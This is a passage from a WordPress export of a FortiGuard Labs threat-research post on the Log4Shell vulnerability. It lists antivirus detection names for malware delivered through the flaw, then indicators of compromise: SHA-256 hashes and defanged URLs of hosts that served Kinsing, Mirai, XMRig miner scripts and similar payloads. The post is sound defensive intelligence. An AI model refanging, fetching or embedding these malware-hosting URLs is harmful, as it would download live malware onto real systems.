client.<\/p>\n<p>Additionally, FortiGuard Labs provides the following AV coverage against older variants of malware that are delivered via Log4Shell:\u00a0<\/p>\n<p><b>Kinsing<\/b><br \/> BASH\/Agent.KG!tr<br \/> BASH\/CoinMiner.AKT!tr<br \/> BASH\/Miner.DB!tr<br \/> W64\/CoinMiner.QG!tr<br \/> BASH\/CoinMiner.RZ!tr<\/p>\n<p><b>Mirai<\/b><br \/> ELF\/Mirai.[random alphabets]<br \/> ELF\/Mirai.[random alphabets]!tr<br \/> Linux\/Mirai[random alphabets]!tr<\/p>\n<p><b>Elknot<\/b><br \/> Linux\/Elknot.[random alphabets]!tr<br \/> ELF\/Elknot.[radom alphabets]!tr<\/p>\n<p><b>Orcus RAT<br \/>  <\/b>W32\/OrcusRAT.[random alphabets]<br \/> W32\/Orcus.[random alphabets]!tr<br \/> W32\/Orcus.[random alphabets]!tr.bdr<\/p>\n<p><b>Muhstik<\/b><br \/> ELF\/DDoS.CIA!tr<br \/> BASH\/Agent.MQ!tr<br \/> Adware\/Tsunami<br \/> ELF\/CoinMiner.CFA!tr<br \/> ELF\/BitCoinMiner.HF!tr<br \/> BAT\/Starter.NZ!tr<br \/> BASH\/CoinMiner.RZ!tr<\/p>\n<p><b>XMRig<\/b><br \/> W32\/XMRigMiner<br \/> Riskware\/XMRig_Miner<br \/> W32\/XMRig_Miner.[random alphabets]!tr<br \/> Riskware\/XMRigCoinMiner<br \/> W32\/XMRig_Miner.[random alphabets]<br \/> Linux\/XMrig.[random alphabets]!tr.dldr<br \/> MSIL\/XMRig_Miner.VC!tr<br \/> W32\/XMRigMiner.WIN64!tr<br \/> W64\/XMRigMiner.WIN64!tr<br \/> W32\/XMRig_Miner.ELF64!tr<br \/> W32\/XMRig_Miner.SMBM4!tr<\/p>\n<p><b>Nanocore RAT<br \/>  <\/b>W32\/Backdoor_MSIL_NANOCORE.BA!tr<br \/> W32\/NANOCORE.[random alphabets]!tr.bdr<br \/> W32\/NanoCore.[random alphabets and numbers]!tr<br \/> Data\/Nanocore.[random alphabets!tr<br \/> W32\/Backdoor_MSIL_NANOCORE.SMIL<br \/> MSIL\/NanoCore.[Random alphabets and numbers]!tr<br \/> Adware\/NanoCore<br \/> Adware\/Backdoor_MSIL_NANOCORE<\/p>\n<p>Apache has also provided mitigation advice for users of earlier versions, as described above.<\/p>\n<p><b><i>IOCs<br \/>  SHA-256 Hash<\/i><\/b><br \/> f2e3f685256e5f31b05fc9f9ca470f527d7fdae28fa3190c8eba179473e20789 (Khonsari ransomware)<br \/> 6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b (Kinsing)<br \/> 7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512 (Kinsing)<br \/> 8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef (Kinsing)<br \/> bcfdddb033fb1fa9c73e222919ecd4be071e87b0c54825af516b4f336bc47fa2 (Elknot)<br \/> 0e574fd30e806fe4298b3cbccb8d1089454f42f52892f87554325cb352646049 (Mirai)<br \/> 19370ef36f43904a57a667839727c09c50d5e94df43b9cfb3183ba766c4eae3d (Mirai)<br \/> 2a4e636c4077b493868ea696db3be864126d1066cdc95131f522a4c9f5fb3fec (Mirai)<br \/> 15e7942ebf88a51346d3a5975bb1c2d87996799e6255db9e92aed798d279b36b (Muhstik)<br \/> 10fad59b071db09aafcb7f40e775f28180aed182786557e9ee7f2f2e332b4513 (m8220)<br \/> 86fc70d24f79a34c46ef66112ef4756639fcad2f2d7288e0eeb0448ffab90428 (Orcus RAT)<br \/> e7c5b3de93a3184dc99c98c7f45e6ff5f6881b15d4a56c144e2e53e96dcc0e82 (SitesLoader)<br \/> f059246cea87a886acb1938809cf4a1152247a5b5a2df0b1bf64c46a0daccbcc (SitesLoader)<br \/> 3e6567dab5e7c7c42a02ac47e8c68f61c9c481bbbbe5ddb1c68e86f7370dab45 (XMRig)<br \/> 95ac2e2cd2caf30829a9588988601067a98f9bb02e0776a8ef2b813f9b4d8992 (XMRig)<br \/> e8b2a8d0c3444c53f143d0b4ba87c23dd1b58b03fd0a6b1bcd6e8358e57807f1 (XMRig)<br \/> bd5006ba4e4cfcf8a8b0b6da5bb30f4dd8a78beb351b814431ae8599dcf23f1b (Nanocore RAT)<br \/> e9744244461056c64fc390591729c035f3a375bc8ecfa1a0c111defa055c1273 (Mirai variant with alleged worm capability)<\/p>\n<p><b>URLs<\/b><br \/> 3[.]145.115.94\/zambo\/groenhuyzen[.]exe<br \/> 3[.]145.115.94\/zambos_caldo_de_p.txt<br \/> hxxp:\/\/3[.]145.115.94\/main.class<br \/> hxxp:\/\/45[.]137.155.55\/kinsing<br \/> hxxp:\/\/45[.]137.155.55\/kinsing2<br \/> hxxp:\/\/80[.]71.158.12\/kinsing<br \/> hxxp:\/\/80[.]71.158.44\/kinsing<br \/> hxxp:\/\/82[.]118.18.201\/kinsing<br \/> hxxp:\/\/92[.]242.40.21\/kinsing<br \/> hxxp:\/\/93[.]189.42.8\/kinsing<br \/> hxxp:\/\/92[.]242.40.21\/lh2.sh<br \/> hxxp:\/\/45[.]137.155.55\/ex.sh<br \/> hxxp:\/\/155[.]94.154.170\/aaa<br \/> hxxp:\/\/138[.]197.206.223\/wp-content\/themes\/twentysixteen\/dk86<br \/> hxxp:\/\/34[.]221.40.237\/.x\/pty5<br \/> hxxp:\/\/34[.]221.40.237\/.x\/pty9<br \/> nazi[.]uy<br \/> hxxp:\/\/agent[.]apacheorg.xyz:1234\/v<br \/> hxxp:\/\/185[.]250.148.157:8005\/index<br \/> hxxp:\/\/103[.]104.73.155:8080\/acc<br \/> hxxp:\/\/129[.]226.180.53\/xmrig_setup\/raw\/master\/setup_c3pool_miner.sh<br \/> hxxp:\/\/download[.]c3pool.com\/xmrig_setup\/raw\/master\/setup_c3pool_miner.sh<br \/> hxxp:\/\/54[.]210.230.186\/wp-content\/themes\/twentyfourteen\/xmrig.exe<br \/> hxxp:\/\/198[.]98.60.67\/bins\/x86<br \/> hxxp:\/\/198.98.60.67\/bins\/arm<br \/> hxxp:\/\/198.98.60.67\/lh.sh <\/p>\n<\/p><\/div>\n<div class=\"cmp cmp-text aem-GridColumn aem-GridColumn--default--12\">\n<p><i>Learn more about Fortinet\u2019s\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?utm_source=blog&amp;utm_campaign=fortiguard-labs\"><i>FortiGuard Labs<\/i><\/a><i>\u00a0threat research and intelligence organization and the FortiGuard Security Subscriptions and Services\u00a0<\/i><a href=\"https:\/\/www.fortinet.com\/fortiguard\/labs?tab=security-bundles&amp;utm_source=blog&amp;utm_campaign=security-bundles\"><i>portfolio<\/i><\/a><i>.<\/i><\/p>\n<\/p><\/div>\n<div class=\"raw-import aem-GridColumn aem-GridColumn--default--12\">\n<div class=\"text-container\">\n<div id=\"om-qbkzwxxbiv83f0ol5a2d-holder\"><\/div>\n<\/div><\/div>\n<\/p><\/div>\n<p><a href=\"https:\/\/www.fortinet.com\/blog\/threat-research\/critical-apache-log4j-log4shell-vulnerability-what-you-need-to-know\" target=\"bwo\" >http:\/\/feeds.feedburner.com\/fortinet\/blog\/threat-research<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"\/blog\/threat-research\/critical-apache-log4j-log4shell-vulnerability-what-you-need-to-know\/_jcr_content\/root\/responsivegrid\/image.img.png\/1640131741914\/img-new.png\"\/><br \/>FortiGuard Labs provides important updates about the Apache Log4j vulnerabilities, including details, campaigns associated with Log4j, and an alleged \u201cwormable\u201d Mirai malware variant. Read to learn more.<\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10424,10378],"tags":[],"class_list":["post-17990","post","type-post","status-publish","format-standard","hentry","category-fortinet","category-security"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17990","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=17990"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/17990\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=17990"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=17990"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=17990"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}